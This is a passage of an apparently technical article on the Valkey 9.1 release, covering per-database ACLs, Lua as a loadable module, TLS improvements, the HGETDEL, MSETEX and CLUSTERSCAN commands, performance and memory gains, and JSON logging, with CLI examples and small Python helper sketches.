&lt;td&gt;2026.05.19&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Valkey 9.1.0 — DB-level ACLs, Lua-as-a-module, new I/O threading (2.1M RPS), HGETDEL/MSETEX/CLUSTERSCAN, JSON logging&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Security/observability/efficiency become operational defaults&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The two operational messages of 9.1: (1) &lt;em&gt;you can solve multi-tenant isolation at db granularity without adding instances&lt;/em&gt; — DB-level ACLs directly cut the cost of instance separation; and (2) &lt;em&gt;observability is now provided directly by the core, without a sidecar&lt;/em&gt; — JSON logging and thread usage metrics absorb gaps you previously filled with exporters and log parsers.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Security — Database-Level ACLs, Lua-as-a-Module, TLS Improvements
&lt;/h2&gt;

&lt;p&gt;In-memory datastores traditionally said "we're fast, but security belongs upstream (app/network policy)." 9.1 pulls more of that responsibility back into the core.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Numbered database-level ACLs — the new multi-tenant isolation standard
&lt;/h3&gt;

&lt;p&gt;Classic ACLs controlled which commands a user could run and which keys they could touch. However, those rules applied identically to &lt;strong&gt;every database&lt;/strong&gt;. Placing tenants in db 0 and db 5 did not separate their permissions, because any user allowed to run &lt;code&gt;SELECT&lt;/code&gt; could switch into the other tenant's db. That made numbered DBs hard to use as a multi-tenancy boundary. 9.1 adds a &lt;code&gt;db=&lt;/code&gt; selector that scopes a user's permissions to specific databases.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Allow app-user only on db 0 and 1&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; ACL SETUSER app-user on &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;secretpass +@all ~&lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="nv"&gt;db&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0,1
OK
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# After auth, db 0 works&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; SELECT 0
OK
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; SET mykey &lt;span class="s2"&gt;"hello"&lt;/span&gt;
OK

&lt;span class="c"&gt;# db 2 is blocked&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; SELECT 2
&lt;span class="o"&gt;(&lt;/span&gt;error&lt;span class="o"&gt;)&lt;/span&gt; NOPERM No permissions to access database
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The operational payoff is large. The pattern of "one instance (or cluster) per tenant for isolation" can become &lt;strong&gt;per-tenant db + per-db ACL inside a single cluster&lt;/strong&gt; when combined with 9.0's cluster-mode numbered DBs. Fewer instances → less memory overhead and operational burden. Caveat: numbered DBs are &lt;em&gt;logical, not physical&lt;/em&gt; isolation, so for strongly regulated data (PII, payments) keep instance separation as well.&lt;/p&gt;
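&lt;p&gt;If the tenant-to-db mapping lives in code or config, you can generate the &lt;code&gt;ACL SETUSER&lt;/code&gt; lines instead of writing them by hand. The generator can also reject mappings that put two tenants in one db. Below is a minimal Python sketch, assuming the &lt;code&gt;db=&lt;/code&gt; selector syntax from the example above. The function name, tenant names, and passwords are hypothetical.&lt;/p&gt;

```python
"""Generate per-tenant ACL SETUSER commands from a tenant -> databases map.

Sketch only: assumes the db= selector syntax shown in the article.
Tenant names and passwords are hypothetical placeholders.
"""


def build_acl_commands(tenants: dict[str, list[int]],
                       passwords: dict[str, str]) -> list[str]:
    owner: dict[int, str] = {}  # db number -> tenant that owns it
    commands = []
    for user, dbs in sorted(tenants.items()):
        for db in dbs:
            # Two tenants sharing one db would defeat per-db isolation.
            if db in owner and owner[db] != user:
                raise ValueError(f"db {db} assigned to {owner[db]} and {user}")
            owner[db] = user
        db_list = ",".join(str(db) for db in sorted(set(dbs)))
        # on: enable the user; >password: add a password; +@all ~*: all
        # commands and keys; db=...: limit the user to the listed databases.
        commands.append(
            f"ACL SETUSER {user} on >{passwords[user]} +@all ~* db={db_list}"
        )
    return commands


if __name__ == "__main__":
    for cmd in build_acl_commands({"tenant-a": [0, 1], "tenant-b": [2]},
                                  {"tenant-a": "pw-a", "tenant-b": "pw-b"}):
        print(cmd)
```

&lt;p&gt;Running it prints one &lt;code&gt;ACL SETUSER&lt;/code&gt; line per tenant, for example &lt;code&gt;db=0,1&lt;/code&gt; for &lt;code&gt;tenant-a&lt;/code&gt;. In a real rollout, the passwords would come from a secret store, and &lt;code&gt;+@all ~*&lt;/code&gt; is worth narrowing per tenant.&lt;/p&gt;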

&lt;h3&gt;
  
  
  2.2 Lua scripting engine moved to a module — attack surface reduction
&lt;/h3&gt;

&lt;p&gt;9.1 extracts the Lua scripting engine from the core server into its own module (&lt;code&gt;libvalkeylua.so&lt;/code&gt;). Running arbitrary Lua via &lt;code&gt;EVAL&lt;/code&gt;/&lt;code&gt;EVALSHA&lt;/code&gt; is powerful, but it is also a well-known attack vector (sandbox escape, resource exhaustion). The point of modularization is &lt;em&gt;"don't load it if you don't need it."&lt;/em&gt; A pure cache workload with no scripting can leave the Lua module unloaded and eliminate the scripting attack surface entirely. The new &lt;code&gt;Scripting Engines&lt;/code&gt; section of &lt;code&gt;INFO&lt;/code&gt; shows which scripting engines are loaded.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; INFO scripting_engines
&lt;span class="c"&gt;# Scripting Engines&lt;/span&gt;
engine_lua:loaded&lt;span class="o"&gt;=&lt;/span&gt;1,libname&lt;span class="o"&gt;=&lt;/span&gt;libvalkeylua.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
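&lt;p&gt;To automate the "is Lua loaded?" check across many clusters, you can parse the INFO text directly. Below is a minimal Python sketch. It assumes every engine line follows the &lt;code&gt;engine_NAME:key=value,...&lt;/code&gt; shape in the sample above. Fetching the INFO text from each node is left to your client of choice.&lt;/p&gt;

```python
"""Parse the INFO scripting_engines section into {engine: {field: value}}.

Line format assumed from the article's sample output:
    engine_lua:loaded=1,libname=libvalkeylua.so
"""


def parse_scripting_engines(info_text: str) -> dict[str, dict[str, str]]:
    engines: dict[str, dict[str, str]] = {}
    for line in info_text.splitlines():
        line = line.strip()
        # Skip blank lines and the "# Scripting Engines" header.
        if not line or line.startswith("#"):
            continue
        name, _, fields = line.partition(":")
        if not name.startswith("engine_"):
            continue
        pairs = [item.split("=", 1) for item in fields.split(",") if "=" in item]
        engines[name[len("engine_"):]] = dict(pairs)
    return engines


def lua_loaded(info_text: str) -> bool:
    """True if the lua engine is reported with loaded=1."""
    return parse_scripting_engines(info_text).get("lua", {}).get("loaded") == "1"


if __name__ == "__main__":
    sample = "# Scripting Engines\nengine_lua:loaded=1,libname=libvalkeylua.so\n"
    print(parse_scripting_engines(sample))
    print("lua loaded:", lua_loaded(sample))
```

&lt;p&gt;On a node where Lua was intentionally dropped, &lt;code&gt;lua_loaded&lt;/code&gt; should return &lt;code&gt;False&lt;/code&gt;. The exact INFO output of a node with no engines loaded is an assumption to confirm on your build.&lt;/p&gt;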



&lt;h3&gt;
  
  
  2.3 TLS auto-reload and SAN-URI-based mTLS
&lt;/h3&gt;

&lt;p&gt;9.1 directly addresses two chronic TLS pain points: "an expired certificate nobody noticed caused an outage" and "rotating certificates requires a restart."&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Improvement&lt;/th&gt;
&lt;th&gt;9.0 and earlier&lt;/th&gt;
&lt;th&gt;9.1&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Cert expiry visibility&lt;/td&gt;
&lt;td&gt;External monitoring only&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;INFO&lt;/code&gt; exposes TLS cert expiration dates&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cert rotation&lt;/td&gt;
&lt;td&gt;Restart required (downtime)&lt;/td&gt;
&lt;td&gt;Background auto-reload (zero downtime)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;mTLS identity&lt;/td&gt;
&lt;td&gt;CN-based&lt;/td&gt;
&lt;td&gt;SAN-URI-based authentication&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;SAN-URI authentication fits workload-identity systems such as SPIFFE/SPIRE, which carry a workload's SPIFFE ID as a URI SAN in its X.509 certificate. This simplifies mTLS in service-mesh and zero-trust environments.&lt;/p&gt;
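&lt;p&gt;A SPIFFE ID is a URI of the form &lt;code&gt;spiffe://TRUST-DOMAIN/PATH&lt;/code&gt;. The sketch below shows the kind of check an mTLS identity policy performs on it: accept only the expected trust domain, then map the workload path to an ACL user. It is a hypothetical Python illustration, and the trust domain, paths, and user names are made up. Valkey 9.1's own mapping of SAN URIs to users is defined by its configuration, not by this code.&lt;/p&gt;

```python
"""Map an mTLS client's SPIFFE ID (URI SAN) to an ACL user name.

Hypothetical policy for illustration; it is not Valkey's own mapping logic.
"""
from typing import Optional
from urllib.parse import urlparse

TRUSTED_DOMAIN = "prod.example.internal"  # hypothetical trust domain
PATH_TO_USER = {                            # hypothetical workload -> user map
    "/ns/payments/sa/api": "payments-app",
    "/ns/web/sa/frontend": "web-app",
}


def acl_user_for(san_uri: str) -> Optional[str]:
    parsed = urlparse(san_uri)
    # A SPIFFE ID is spiffe://TRUST-DOMAIN/PATH with no query or fragment.
    if parsed.scheme != "spiffe" or parsed.query or parsed.fragment:
        return None
    if parsed.netloc != TRUSTED_DOMAIN:
        return None  # certificate issued for a different trust domain
    return PATH_TO_USER.get(parsed.path)


if __name__ == "__main__":
    print(acl_user_for("spiffe://prod.example.internal/ns/web/sa/frontend"))
    print(acl_user_for("spiffe://other.example/ns/web/sa/frontend"))
```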

&lt;h2&gt;
  
  
  3. New Commands — HGETDEL / MSETEX / CLUSTERSCAN
&lt;/h2&gt;

&lt;p&gt;9.1 absorbed "common patterns that used to need multiple round trips or a transaction" into single atomic commands.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 HGETDEL — atomically get and delete hash fields
&lt;/h3&gt;

&lt;p&gt;For queue patterns (read data and remove it immediately), you previously had to wrap &lt;code&gt;HGET&lt;/code&gt; + &lt;code&gt;HDEL&lt;/code&gt; in &lt;code&gt;MULTI&lt;/code&gt;. &lt;code&gt;HGETDEL&lt;/code&gt; does it in one shot.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; HSET job:42 status &lt;span class="s2"&gt;"pending"&lt;/span&gt; payload &lt;span class="s1"&gt;'{"action":"send_email"}'&lt;/span&gt; retries &lt;span class="s2"&gt;"3"&lt;/span&gt;
&lt;span class="o"&gt;(&lt;/span&gt;integer&lt;span class="o"&gt;)&lt;/span&gt; 3
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; HGETDEL job:42 FIELDS 2 status payload
1&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"pending"&lt;/span&gt;
2&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"{&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;action&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;:&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;send_email&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;}"&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; HGETALL job:42
1&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"retries"&lt;/span&gt;
2&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"3"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
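&lt;p&gt;To pin down what the transcript above shows, here is a pure-Python model of the semantics over a dict of hashes. Requested values come back in order, those fields are removed, and the rest of the hash survives. The model covers behavior only; it is not a client. Two details are assumptions modeled on Redis's HGETDEL: a missing field returns nil (&lt;code&gt;None&lt;/code&gt; here), and the key disappears once its last field is removed.&lt;/p&gt;

```python
"""In-memory model of HGETDEL semantics (not a client for a real server)."""
from typing import Optional


def hgetdel(store: dict[str, dict[str, str]], key: str,
            fields: list[str]) -> list[Optional[str]]:
    h = store.get(key, {})
    # Read and remove each requested field; missing fields come back as None.
    values = [h.pop(f, None) for f in fields]
    # Assumption: a hash with no fields left is removed entirely.
    if key in store and not store[key]:
        del store[key]
    return values


if __name__ == "__main__":
    store = {"job:42": {"status": "pending",
                        "payload": '{"action":"send_email"}',
                        "retries": "3"}}
    print(hgetdel(store, "job:42", ["status", "payload"]))
    print(store)  # only "retries" remains, matching the HGETALL above
```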



&lt;h3&gt;
  
  
  3.2 MSETEX — set multiple keys with a shared TTL
&lt;/h3&gt;

&lt;p&gt;Setting many keys with the same TTL used to require multiple &lt;code&gt;SETEX&lt;/code&gt; calls or a &lt;code&gt;SET&lt;/code&gt;+&lt;code&gt;EXPIRE&lt;/code&gt; pipeline. &lt;code&gt;MSETEX&lt;/code&gt; does it in one command, cutting round trips, and supports conditional sets via &lt;code&gt;NX&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Set 3 session keys, all expiring in 3600s&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; MSETEX 3 session:abc &lt;span class="s2"&gt;"user:1"&lt;/span&gt; session:def &lt;span class="s2"&gt;"user:2"&lt;/span&gt; session:ghi &lt;span class="s2"&gt;"user:3"&lt;/span&gt; EX 3600
OK
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; TTL session:abc
&lt;span class="o"&gt;(&lt;/span&gt;integer&lt;span class="o"&gt;)&lt;/span&gt; 3600

&lt;span class="c"&gt;# NX: only set keys that don't already exist&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; MSETEX 2 session:abc &lt;span class="s2"&gt;"user:99"&lt;/span&gt; session:xyz &lt;span class="s2"&gt;"user:4"&lt;/span&gt; NX EX 3600
OK
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; GET session:abc
&lt;span class="s2"&gt;"user:1"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
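&lt;p&gt;&lt;code&gt;MSETEX&lt;/code&gt; takes a key count followed by key/value pairs and then options, so large batches are easy to build programmatically. Below is a minimal Python sketch, assuming the argument order used in the transcript above (&lt;code&gt;MSETEX numkeys key value ... [NX] EX seconds&lt;/code&gt;). &lt;code&gt;chunk_size&lt;/code&gt; is a hypothetical knob. Each chunk is a separate command, so whatever atomicity &lt;code&gt;MSETEX&lt;/code&gt; provides, including the &lt;code&gt;NX&lt;/code&gt; check, applies per chunk rather than across the whole batch.&lt;/p&gt;

```python
"""Build MSETEX argument lists for a batch of key/value pairs.

Argument order follows the article's examples:
    MSETEX numkeys key value [key value ...] [NX] EX seconds
"""


def msetex_commands(items: dict[str, str], ttl_seconds: int,
                    nx: bool = False, chunk_size: int = 100) -> list[list[str]]:
    if not (ttl_seconds > 0 and chunk_size > 0):
        raise ValueError("ttl_seconds and chunk_size must be positive")
    pairs = list(items.items())
    commands = []
    for start in range(0, len(pairs), chunk_size):
        chunk = pairs[start:start + chunk_size]
        argv = ["MSETEX", str(len(chunk))]  # numkeys counts pairs in this chunk
        for key, value in chunk:
            argv += [key, value]
        if nx:
            argv.append("NX")
        argv += ["EX", str(ttl_seconds)]
        commands.append(argv)
    return commands


if __name__ == "__main__":
    sessions = {"session:abc": "user:1", "session:def": "user:2",
                "session:ghi": "user:3"}
    for argv in msetex_commands(sessions, 3600):
        print(" ".join(argv))
```

&lt;p&gt;Each argument list can then be sent with a client's generic command call, for example &lt;code&gt;execute_command(*argv)&lt;/code&gt; in redis-py-style clients.&lt;/p&gt;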



&lt;h3&gt;
  
  
  3.3 CLUSTERSCAN — cluster-wide key scanning
&lt;/h3&gt;

&lt;p&gt;Iterating all keys in a cluster previously meant clients independently &lt;code&gt;SCAN&lt;/code&gt;-ing each node and merging results. &lt;code&gt;CLUSTERSCAN&lt;/code&gt; offers a single interface to traverse all nodes, with &lt;code&gt;MATCH&lt;/code&gt;/&lt;code&gt;TYPE&lt;/code&gt;/&lt;code&gt;SLOT&lt;/code&gt; filters.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Iterate all cluster keys (repeat until cursor returns 0)&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CLUSTERSCAN 0
1&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"3"&lt;/span&gt;
2&lt;span class="o"&gt;)&lt;/span&gt; 1&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"user:1001"&lt;/span&gt;
   2&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"user:1002"&lt;/span&gt;
   3&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="s2"&gt;"session:abc"&lt;/span&gt;

&lt;span class="c"&gt;# Filter by pattern&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CLUSTERSCAN 0 MATCH &lt;span class="s2"&gt;"session:*"&lt;/span&gt;
&lt;span class="c"&gt;# Filter by type&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CLUSTERSCAN 0 TYPE &lt;span class="nb"&gt;hash&lt;/span&gt;
&lt;span class="c"&gt;# Scan a specific slot&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; CLUSTERSCAN 0 SLOT 7638
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
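&lt;p&gt;The "repeat until cursor returns 0" loop uses the same cursor protocol as &lt;code&gt;SCAN&lt;/code&gt;. The Python sketch below implements that loop. The server call is abstracted as a function that takes a cursor and returns &lt;code&gt;(next_cursor, keys)&lt;/code&gt;, so the sketch runs without a server; the fake scanner is hypothetical. The loop treats cursors as opaque strings. It also yields each key only once, assuming &lt;code&gt;CLUSTERSCAN&lt;/code&gt; shares &lt;code&gt;SCAN&lt;/code&gt;'s caveat that a key may be returned more than once.&lt;/p&gt;

```python
"""Cursor loop for CLUSTERSCAN-style iteration, server call abstracted."""
from typing import Callable, Iterator

# scan(cursor) -> (next_cursor, keys); cursors are treated as opaque strings.
ScanFn = Callable[[str], tuple[str, list[str]]]


def iterate_keys(scan: ScanFn) -> Iterator[str]:
    seen: set[str] = set()
    cursor = "0"
    while True:
        cursor, keys = scan(cursor)
        for key in keys:
            # Like SCAN, a key may come back more than once; yield it once.
            if key not in seen:
                seen.add(key)
                yield key
        if cursor == "0":  # a "0" cursor ends the iteration
            break


def make_fake_scan(pages: list[list[str]]) -> ScanFn:
    """Hypothetical in-memory stand-in for the server, one page per call."""
    def scan(cursor: str) -> tuple[str, list[str]]:
        index = int(cursor)
        nxt = index + 1
        return ("0" if nxt == len(pages) else str(nxt)), pages[index]
    return scan


if __name__ == "__main__":
    pages = [["user:1001", "user:1002"], ["session:abc", "user:1001"]]
    print(list(iterate_keys(make_fake_scan(pages))))
```

&lt;p&gt;The &lt;code&gt;seen&lt;/code&gt; set grows with the number of keys returned. For very large keyspaces it may be better to drop deduplication and make the consumer idempotent instead.&lt;/p&gt;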



&lt;h2&gt;
  
  
  4. Performance — New I/O Threading Model Hits 2.1M RPS on a Single Server
&lt;/h2&gt;

&lt;p&gt;9.1 pushes single-server throughput to &lt;strong&gt;2.1M RPS&lt;/strong&gt; with &lt;strong&gt;512-byte payloads, 9 IO threads, and pipeline depth 10&lt;/strong&gt;. The core change is a redesign of how the IO threads communicate.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Improvement&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;th&gt;Effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;New I/O threading model&lt;/td&gt;
&lt;td&gt;Redesigned IO thread communication&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;17%&lt;/strong&gt; higher throughput across workloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Faster stream ops&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;XRANGE&lt;/code&gt;/&lt;code&gt;XREVRANGE&lt;/code&gt; hot-path optimization&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;30%&lt;/strong&gt; faster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Higher-throughput GETs&lt;/td&gt;
&lt;td&gt;Raised string embedding size threshold&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;30%&lt;/strong&gt; higher for string GET&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Faster sorted-set queries&lt;/td&gt;
&lt;td&gt;Skiplist query processing improvements&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ZRANGEBYSCORE&lt;/code&gt;/&lt;code&gt;ZRANGEBYLEX&lt;/code&gt; faster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cached COMMAND responses&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;COMMAND&lt;/code&gt; responses are cached&lt;/td&gt;
&lt;td&gt;Shorter client-init connection time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware clock by default&lt;/td&gt;
&lt;td&gt;Less time-syscall overhead&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;3%&lt;/strong&gt; overall GET/SET improvement&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Enabling the hardware clock by default looks minor, but it affects every command: the time lookup each command performs now reads a hardware counter instead of making a syscall. Before rolling out, validate monotonic-clock behavior on virtualized or otherwise unusual environments.&lt;/p&gt;
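&lt;p&gt;A rough staging pre-check is to see which clocksource the Linux kernel uses and how expensive a monotonic clock read is on that host. On some VMs the kernel falls back from the TSC to a slower clocksource. The Python sketch below checks the host, not Valkey's own clock code path, so treat it as a proxy. The sample count is arbitrary.&lt;/p&gt;

```python
"""Staging smoke check of the host clock (a proxy, not Valkey's own code path)."""
import time
from pathlib import Path
from typing import Optional

CLOCKSOURCE = Path("/sys/devices/system/clocksource/clocksource0/current_clocksource")


def current_clocksource() -> Optional[str]:
    """Linux-only: the kernel's active clocksource name, or None elsewhere."""
    try:
        return CLOCKSOURCE.read_text().strip()
    except OSError:
        return None


def clock_read_cost_ns(samples: int = 200_000) -> float:
    """Average cost of one monotonic clock read, in nanoseconds."""
    start = time.perf_counter_ns()
    for _ in range(samples):
        time.monotonic_ns()
    return (time.perf_counter_ns() - start) / samples


if __name__ == "__main__":
    print("clocksource:", current_clocksource())
    print(f"monotonic read: {clock_read_cost_ns():.0f} ns")
```

&lt;p&gt;Two readings justify extra soak time before enabling 9.1 on a host: a clocksource that differs from your other hosts, or a read cost far above theirs.&lt;/p&gt;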

&lt;h2&gt;
  
  
  5. Efficiency — Memory Reduction and Rehashing / Bulk-Delete Optimization
&lt;/h2&gt;

&lt;p&gt;As important as throughput is "the same data in less memory." 9.1 delivers meaningful savings on small strings and sorted sets.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Optimization&lt;/th&gt;
&lt;th&gt;Target&lt;/th&gt;
&lt;th&gt;Effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;String memory reduction&lt;/td&gt;
&lt;td&gt;Strings &amp;lt; 128 bytes (internal pointer optimization)&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;20%&lt;/strong&gt; less memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sorted-set memory reduction&lt;/td&gt;
&lt;td&gt;Skiplist optimization&lt;/td&gt;
&lt;td&gt;Up to &lt;strong&gt;10%&lt;/strong&gt; less memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rehashing performance&lt;/td&gt;
&lt;td&gt;Internal hash-table rehashing on keyspace growth&lt;/td&gt;
&lt;td&gt;Reduced latency impact during rehashing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bulk delete&lt;/td&gt;
&lt;td&gt;Pause resizing during &lt;code&gt;SREM&lt;/code&gt;/&lt;code&gt;ZREM&lt;/code&gt;/&lt;code&gt;HDEL&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Removes needless rehashing → faster bulk deletes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Replica creation&lt;/td&gt;
&lt;td&gt;Reuse received RDB as AOF base when AOF enabled&lt;/td&gt;
&lt;td&gt;No initial snapshot regeneration&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;"20% savings on sub-128-byte strings" is very tangible for services that store huge numbers of small strings — session tokens, flags, short cache values. A cache holding tens of millions of small keys cuts memory cost from the upgrade alone.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. Observability — JSON Logging and Thread Usage Metrics
&lt;/h2&gt;

&lt;p&gt;A long-standing Valkey/Redis ops weakness was "logs are human-readable plain text, awkward for observability tools to parse." 9.1 emits structured logs directly from the core via &lt;code&gt;log-format json&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# valkey.conf&lt;/span&gt;
log-format json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output is one JSON object per line — Loki/Elastic/CloudWatch can parse it immediately without custom grok patterns.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"pid"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;14500&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"role"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"primary"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"timestamp"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"14 May 2026 14:13:02.921"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"level"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"notice"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"message"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"oO0OoO0OoO0Oo Valkey is starting oO0OoO0OoO0Oo"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"pid"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;14500&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"role"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"primary"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"timestamp"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"14 May 2026 14:13:02.928"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"level"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"warning"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nl"&gt;"message"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;"WARNING: The TCP backlog setting of 511 cannot be enforced..."&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
